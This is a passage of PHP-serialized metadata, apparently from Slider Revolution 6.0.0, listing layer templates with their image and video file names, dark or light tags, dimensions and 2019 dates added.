09:24:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:370;a:13:{s:2:\"id\";s:3:\"337\";s:6:\"handle\";s:27:\"limited_time_offer_dark.jpg\";s:5:\"video\";s:27:\"limited_time_offer_dark.mp4\";s:4:\"name\";s:23:\"limited_time_offer_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:23:\"limited_time_offer_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-26 09:24:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:371;a:13:{s:2:\"id\";s:3:\"336\";s:6:\"handle\";s:26:\"slider_revolution_dark.jpg\";s:5:\"video\";s:26:\"slider_revolution_dark.mp4\";s:4:\"name\";s:22:\"slider_revolution_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:22:\"slider_revolution_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-26 09:24:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:372;a:13:{s:2:\"id\";s:3:\"335\";s:6:\"handle\";s:19:\"mick_brown_dark.jpg\";s:5:\"video\";s:19:\"mick_brown_dark.mp4\";s:4:\"name\";s:15:\"mick_brown_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:15:\"mick_brown_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-26 09:24:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:373;a:13:{s:2:\"id\";s:3:\"334\";s:6:\"handle\";s:14:\"sales_dark.jpg\";s:5:\"video\";s:14:\"sales_dark.mp4\";s:4:\"name\";s:10:\"sales_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:10:\"sales_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-12 08:32:18\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:374;a:13:{s:2:\"id\";s:3:\"333\";s:6:\"handle\";s:21:\"robert_smith_dark.jpg\";s:5:\"video\";s:21:\"robert_smith_dark.mp4\";s:4:\"name\";s:17:\"robert_smith_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:17:\"robert_smith_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-12 08:32:18\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:375;a:13:{s:2:\"id\";s:3:\"332\";s:6:\"handle\";s:21:\"product_name_dark.jpg\";s:5:\"video\";s:21:\"product_name_dark.mp4\";s:4:\"name\";s:17:\"product_name_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:17:\"product_name_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-12 08:32:18\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:376;a:13:{s:2:\"id\";s:3:\"331\";s:6:\"handle\";s:21:\"high_quality_dark.jpg\";s:5:\"video\";s:21:\"high_quality_dark.mp4\";s:4:\"name\";s:17:\"high_quality_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:17:\"high_quality_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-12 08:32:18\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:377;a:13:{s:2:\"id\";s:3:\"330\";s:6:\"handle\";s:24:\"robert_johnson_light.jpg\";s:5:\"video\";s:24:\"robert_johnson_light.mp4\";s:4:\"name\";s:20:\"robert_johnson_light\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:20:\"robert_johnson_light\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-12 08:32:18\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:378;a:13:{s:2:\"id\";s:3:\"329\";s:6:\"handle\";s:21:\"jake_collins_dark.jpg\";s:5:\"video\";s:21:\"jake_collins_dark.mp4\";s:4:\"name\";s:17:\"jake_collins_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:17:\"jake_collins_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-12 08:32:18\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:379;a:13:{s:2:\"id\";s:3:\"328\";s:6:\"handle\";s:22:\"daniele_wood_light.jpg\";s:5:\"video\";s:22:\"daniele_wood_light.mp4\";s:4:\"name\";s:18:\"daniele_wood_light\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:18:\"daniele_wood_light\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-12 08:31:30\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:380;a:13:{s:2:\"id\";s:3:\"327\";s:6:\"handle\";s:23:\"michael_blake_light.jpg\";s:5:\"video\";s:23:\"michael_blake_light.mp4\";s:4:\"name\";s:19:\"michael_blake_light\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:19:\"michael_blake_light\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-05 09:20:21\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:381;a:13:{s:2:\"id\";s:3:\"326\";s:6:\"handle\";s:22:\"product_name_light.jpg\";s:5:\"video\";s:22:\"product_name_light.mp4\";s:4:\"name\";s:18:\"product_name_light\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:18:\"product_name_light\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-05 09:20:21\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:382;a:13:{s:2:\"id\";s:3:\"325\";s:6:\"handle\";s:24:\"rebecca_cooper_light.jpg\";s:5:\"video\";s:24:\"rebecca_cooper_light.mp4\";s:4:\"name\";s:20:\"rebecca_cooper_light\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:20:\"rebecca_cooper_light\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-05 09:20:21\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:383;a:13:{s:2:\"id\";s:3:\"324\";s:6:\"handle\";s:28:\"limited_time_offer_light.jpg\";s:5:\"video\";s:28:\"limited_time_offer_light.mp4\";s:4:\"name\";s:24:\"limited_time_offer_light\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:24:\"limited_time_offer_light\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-05 09:20:21\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:384;a:13:{s:2:\"id\";s:3:\"322\";s:6:\"handle\";s:22:\"jake_michael_light.jpg\";s:5:\"video\";s:22:\"jake_michael_light.mp4\";s:4:\"name\";s:18:\"jake_michael_light\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:18:\"jake_michael_light\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-05 09:20:21\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:385;a:13:{s:2:\"id\";s:3:\"321\";s:6:\"handle\";s:23:\"colin_johnson_light.jpg\";s:5:\"video\";s:23:\"colin_johnson_light.mp4\";s:4:\"name\";s:19:\"colin_johnson_light\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:19:\"colin_johnson_light\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-05 09:20:21\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:386;a:13:{s:2:\"id\";s:3:\"320\";s:6:\"handle\";s:21:\"colin_morris_dark.jpg\";s:5:\"video\";s:21:\"colin_morris_dark.mp4\";s:4:\"name\";s:17:\"colin_morris_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:17:\"colin_morris_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-21 09:07:08\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:387;a:13:{s:2:\"id\";s:3:\"319\";s:6:\"handle\";s:22:\"justin_cooper_dark.jpg\";s:5:\"video\";s:22:\"justin_cooper_dark.mp4\";s:4:\"name\";s:18:\"justin_cooper_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:18:\"justin_cooper_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-21 09:07:08\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:388;a:13:{s:2:\"id\";s:3:\"318\";s:6:\"handle\";s:21:\"james-dodson_dark.jpg\";s:5:\"video\";s:21:\"james-dodson_dark.mp4\";s:4:\"name\";s:17:\"james-dodson_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:17:\"james-dodson_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-21 09:07:08\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:389;a:13:{s:2:\"id\";s:3:\"317\";s:6:\"handle\";s:23:\"robert_sanders_dark.jpg\";s:5:\"video\";s:23:\"robert_sanders_dark.mp4\";s:4:\"name\";s:19:\"robert_sanders_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:19:\"robert_sanders_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-21 09:07:08\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:390;a:13:{s:2:\"id\";s:3:\"316\";s:6:\"handle\";s:21:\"emily_carney_dark.jpg\";s:5:\"video\";s:21:\"emily_carney_dark.mp4\";s:4:\"name\";s:17:\"emily_carney_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:17:\"emily_carney_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-21 09:07:08\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:391;a:13:{s:2:\"id\";s:3:\"315\";s:6:\"handle\";s:22:\"michael-smith_dark.jpg\";s:5:\"video\";s:22:\"michael-smith_dark.mp4\";s:4:\"name\";s:18:\"michael-smith_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:18:\"michael-smith_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-21 09:07:08\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:392;a:13:{s:2:\"id\";s:3:\"314\";s:6:\"handle\";s:23:\"sandra_johnson_dark.jpg\";s:5:\"video\";s:23:\"sandra_johnson_dark.mp4\";s:4:\"name\";s:19:\"sandra_johnson_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:19:\"sandra_johnson_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-21 09:07:08\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:393;a:13:{s:2:\"id\";s:3:\"313\";s:6:\"handle\";s:22:\"robert_bolton_dark.jpg\";s:5:\"video\";s:22:\"robert_bolton_dark.mp4\";s:4:\"name\";s:18:\"robert_bolton_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:18:\"robert_bolton_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-21 09:07:08\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:394;a:13:{s:2:\"id\";s:3:\"312\";s:6:\"handle\";s:25:\"elegant_captions_dark.png\";s:5:\"video\";s:25:\"elegant_captions_dark.mp4\";s:4:\"name\";s:21:\"elegant_captions_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:21:\"elegant_captions_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-18 14:41:45\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:395;a:13:{s:2:\"id\";s:3:\"311\";s:6:\"handle\";s:19:\"Caption_Dark_06.png\";s:5:\"video\";s:19:\"Caption_Dark_06.mp4\";s:4:\"name\";s:15:\"Caption_Dark_06\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:15:\"Caption_Dark_06\";s:5:\"width\";s:3:\"414\";s:6:\"height\";s:3:\"225\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:396;a:13:{s:2:\"id\";s:3:\"310\";s:6:\"handle\";s:19:\"Header_Light_02.png\";s:5:\"video\";s:19:\"Header_Light_02.mp4\";s:4:\"name\";s:15:\"Header_Light_02\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:15:\"Header_Light_02\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:397;a:13:{s:2:\"id\";s:3:\"309\";s:6:\"handle\";s:21:\"Columns_4_Dark_01.png\";s:5:\"video\";s:21:\"Columns_4_Dark_01.mp4\";s:4:\"name\";s:17:\"Columns_4_Dark_01\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:17:\"Columns_4_Dark_01\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:398;a:13:{s:2:\"id\";s:3:\"308\";s:6:\"handle\";s:18:\"Header_Dark_01.png\";s:5:\"video\";s:18:\"Header_Dark_01.mp4\";s:4:\"name\";s:14:\"Header_Dark_01\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:14:\"Header_Dark_01\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:399;a:13:{s:2:\"id\";s:3:\"307\";s:6:\"handle\";s:19:\"Caption_Dark_03.png\";s:5:\"video\";s:19:\"Caption_Dark_03.mp4\";s:4:\"name\";s:15:\"Caption_Dark_03\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:15:\"Caption_Dark_03\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:400;a:13:{s:2:\"id\";s:3:\"306\";s:6:\"handle\";s:21:\"Columns_3_Dark_01.png\";s:5:\"video\";s:21:\"Columns_3_Dark_01.mp4\";s:4:\"name\";s:17:\"Columns_3_Dark_01\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:17:\"Columns_3_Dark_01\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:401;a:13:{s:2:\"id\";s:3:\"305\";s:6:\"handle\";s:19:\"Caption_Dark_05.png\";s:5:\"video\";s:19:\"Caption_Dark_05.mp4\";s:4:\"name\";s:15:\"Caption_Dark_05\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:15:\"Caption_Dark_05\";s:5:\"width\";s:4:\"1104\";s:6:\"height\";s:3:\"600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:402;a:13:{s:2:\"id\";s:3:\"304\";s:6:\"handle\";s:20:\"Caption_Light_06.png\";s:5:\"video\";s:20:\"Caption_Light_06.mp4\";s:4:\"name\";s:16:\"Caption_Light_06\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:16:\"Caption_Light_06\";s:5:\"width\";s:3:\"828\";s:6:\"height\";s:3:\"450\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:403;a:13:{s:2:\"id\";s:3:\"303\";s:6:\"handle\";s:19:\"Header_Light_01.png\";s:5:\"video\";s:19:\"Header_Light_01.mp4\";s:4:\"name\";s:15:\"Header_Light_01\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:15:\"Header_Light_01\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:404;a:13:{s:2:\"id\";s:3:\"302\";s:6:\"handle\";s:20:\"Caption_Light_03.png\";s:5:\"video\";s:20:\"Caption_Light_03.mp4\";s:4:\"name\";s:16:\"Caption_Light_03\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:16:\"Caption_Light_03\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:405;a:13:{s:2:\"id\";s:3:\"301\";s:6:\"handle\";s:19:\"Caption_Dark_01.png\";s:5:\"video\";s:19:\"Caption_Dark_01.mp4\";s:4:\"name\";s:15:\"Caption_Dark_01\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:15:\"Caption_Dark_01\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:406;a:13:{s:2:\"id\";s:3:\"300\";s:6:\"handle\";s:21:\"PromoCode_Dark_01.png\";s:5:\"video\";s:21:\"PromoCode_Dark_01.mp4\";s:4:\"name\";s:17:\"PromoCode_Dark_01\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:17:\"PromoCode_Dark_01\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:407;a:13:{s:2:\"id\";s:3:\"299\";s:6:\"handle\";s:19:\"Caption_Dark_02.png\";s:5:\"video\";s:19:\"Caption_Dark_02.mp4\";s:4:\"name\";s:15:\"Caption_Dark_02\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:15:\"Caption_Dark_02\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:408;a:13:{s:2:\"id\";s:3:\"298\";s:6:\"handle\";s:18:\"Header_Dark_02.png\";s:5:\"video\";s:18:\"Header_Dark_02.mp4\";s:4:\"name\";s:14:\"Header_Dark_02\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:14:\"Header_Dark_02\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:409;a:13:{s:2:\"id\";s:3:\"297\";s:6:\"handle\";s:22:\"Columns_3_Light_01.png\";s:5:\"video\";s:22:\"Columns_3_Light_01.mp4\";s:4:\"name\";s:18:\"Columns_3_Light_01\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:18:\"Columns_3_Light_01\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 